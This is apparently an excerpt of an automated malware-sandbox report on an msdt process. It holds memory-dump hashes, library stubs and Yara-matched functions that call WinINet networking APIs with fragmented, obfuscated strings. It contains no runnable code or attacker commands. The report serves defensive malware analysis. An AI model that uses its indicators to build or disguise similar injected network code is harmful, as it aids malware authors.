                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025907AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0258FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118CE0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 109 118ce0-118d26 call 119280 112 118d28-118d4e HttpOpenRequestA 109->112 113 118d4f-118d55 109->113
                                                                    APIs
                                                                    • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00118D48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                    • API String ID: 1984915467-4016285707
                                                                    • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                    • Instruction ID: 30041cc37ad6a69c6afab9055cbc355ced46a27f2f5bafc255ecd933d33d4acd
                                                                    • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                    • Instruction Fuzzy Hash: 9701E9B2905159AFCB04DF98D841DEF7BB9EB48210F158298FD08A7205D630ED10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118D60, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 114 118d60-118da6 call 119280 117 118dc3-118dc9 114->117 118 118da8-118dc2 HttpSendRequestA 114->118
                                                                    APIs
                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00118DBC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpRequestSend
                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                    • API String ID: 360639707-2503632690
                                                                    • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                    • Instruction ID: 03d14c32d01c4aa8e36aa776a09cf143c50321c79be6586df34e5794f6a158a1
                                                                    • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                    • Instruction Fuzzy Hash: A801FFB2905119AFCB14DF98D8459EF7BB8EB54210F158199FD18A7205D770EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118C60, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 119 118c60-118ca6 call 119280 122 118ca8-118cce InternetConnectA 119->122 123 118ccf-118cd5 119->123
                                                                    APIs
                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00118CC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                    • API String ID: 3050416762-1024195942
                                                                    • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                    • Instruction ID: c91294ad2d59e08b2f05f008318d83df39e5d34e11bb9ff097adec3b7d9113ca
                                                                    • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                                                    • Instruction Fuzzy Hash: 7F01E9B2915119AFCB14DF99D941EEF77B8EB48310F158299FE08A7241D670EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118BF0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
